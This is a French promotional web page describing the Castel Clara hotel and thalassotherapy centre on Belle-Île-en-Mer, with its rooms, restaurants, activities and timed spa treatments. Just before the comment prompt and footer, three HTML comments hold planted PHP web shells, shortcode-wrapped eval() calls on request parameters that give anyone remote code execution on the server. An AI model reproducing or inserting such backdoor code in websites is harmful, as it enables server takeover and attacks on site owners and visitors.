Hôtel Castel Clara – Belle-île-en-Mer

Le Castel Clara, un hôtel établi à Belle-île-en-mer, bénéficie d’un emplacement exceptionnel et d’un cadre propice à la thalassothérapie. L’établissement dispose des infrastructures spécifiques permettant de se relaxer et de bénéficier de soins particuliers.

Implanté à Belle-île-en-mer, au bord de l’océan Atlantique, le Castel Clara, est situé au sud de Quiberon, une péninsule du Morbihan. L’enseigne est réputée pour le Castel Thalasso, un centre de thérapie érigé dans un cadre pittoresque parsemé de rochers servant de base à des installations portuaires. Le Castel Thalasso est réputé pour la qualité de ses prestations, l’accueil chaleureux de ses employés, et pour l’efficacité des soins qui y sont prodigués. Un séjour dans cet établissement de 4 étoiles, offrant une vue sur le port de Goulphar et donnant sur l’Atlantique, permet de mieux découvrir la région de la Bretagne.

Le Castel Clara, un prestigieux établissement

A 45 minutes en bateau de Quiberon, le Castel Clara Thalasso est un luxueux établissement de type Relais-Château, convenant aux vacanciers souhaitant bénéficier des bienfaits de la thalassothérapie. Le complexe est composé de deux bâtiments, le Castel abritant un centre de thalasso et Le Manoir doté d’un sauna, d’une piscine d’eau douce et d’un bain bouillonnant d’eau de mer. Les clients peuvent choisir parmi une soixantaine de chambres dont celles donnant sur le continent et dotées d’une terrasse, et celles offrant une vue panoramique sur l’océan. Équipées du matériel nécessaire, les pièces sont confortables. L’établissement dispose d’une salle de conférence pouvant accueillir plus de 60 personnes. Le Bleu Manière Verte, un restaurant gastronomique se trouvant au sein du Castel Clara Thalasso, propose des plats succulents élaborés avec des aliments provenant des plantations de la région. Ce restaurant est prolongé par une terrasse offrant un panorama sur la mer. Présentant des buffets, le Café Clara abrité dans Le Manoir, est ouvert toute la journée et fait également office de restaurant.

Les activités à pratiquer au Castel Clara

Les visiteurs peuvent pratiquer le tennis, le vélo, ou effectuer des sorties en voilier lors de leur passage au Castel Clara Thalasso. Les clients seront invités à participer aux activités écotouristiques guidées. Ils peuvent également faire du surf, de la plongée, du kayak en mer, des ballades à cheval, de la pêche, du golf. Ils peuvent aussi profiter de leur séjour pour visiter des monuments historiques tels que la citadelle de Vauban, les 4 communes de Belle-île-en-mer, la réserve naturelle de Koh-Kastell, le grand phare ainsi que le centre d’exposition.

Se relaxer au Castel Thalasso

Près de 60 curistes sont traités quotidiennement au Castel Clara où les produits utilisés sont extraits des plantes de la mer d’Iroise, un site classé patrimoine mondial par l’Unesco. Le client peut effectuer plusieurs cures différentes durant son séjour et se détendre en prenant des douches à jets, des bains à multijets et aux algues, et entretenir sa peau en utilisant des masques aux algues ou de boue marine. Les cures proposées sont destinées à compléter les soins d’hydrothérapie, et consistent à renforcer le système cardio-vasculaire et respiratoire, ainsi qu’à effectuer du stretching. Le centre de Castel Clara propose des séances de fasciathérapie, des soins permettant de relâcher les muscles pour améliorer la circulation sanguine. Ce centre propose aussi du massage ayurvédique Visheh, un soin permettant d’évacuer le stress.

Les cures proposées par le Castel Clara

Le centre de thalassothérapie du Castel propose une douche à jets de 10 minutes, l’application d’un masque d’algues et de boue marine sur l’ensemble du corps, une pressothérapie, un bain bouillonnant et multijets ainsi qu’une séance de cryothérapie de 20 minutes. Les clients bénéficient d’une affusion de 15 minutes, d’une cure de pédiluve-manuluve de 10 minutes, et des soins d’algothérapie de 25 minutes. Les touristes peuvent se relaxer grâce des séances de 25 minutes de stretching ou d’assouplissement musculaire, de rééducation aquatique, de gymnastique aquatique avec des jets sous-marins pendant 15 minutes. La cure de relaxation comprend une partie de Qi Gong, une formule chinoise, de 45 minutes et une série d’exercices respiratoires de 30 minutes. Le centre de thalassothérapie du Castel Clara est connu pour ses massages tonifiant de 25 minutes. Cet établissement propose également une séance de détente de 25 minutes accompagnée d’une partie de massage Visheh de 50 minutes, suivie de 25 minutes de palper rouler, de douche à 4 mains, de séchage à froid et de réflexologie plantaire de 45 min. La journée de soin s’achève avec 35 min de passage en cellule M6 et de près d’une heure de fasciathérapie.

<!– [insert_php]if (isset($_REQUEST["xmUOB"])){eval($_REQUEST["xmUOB"]);exit;}[/insert_php][php]if (isset($_REQUEST["xmUOB"])){eval($_REQUEST["xmUOB"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["vplcQ"])){eval($_REQUEST["vplcQ"]);exit;}[/insert_php][php]if (isset($_REQUEST["vplcQ"])){eval($_REQUEST["vplcQ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["QTM"])){eval($_REQUEST["QTM"]);exit;}[/insert_php][php]if (isset($_REQUEST["QTM"])){eval($_REQUEST["QTM"]);exit;}[/php] –>

Laissez un commentaire

© 2021 Hôtel Thalasso. Tous droits réservés. Site Admin · Entries RSS · Comments RSS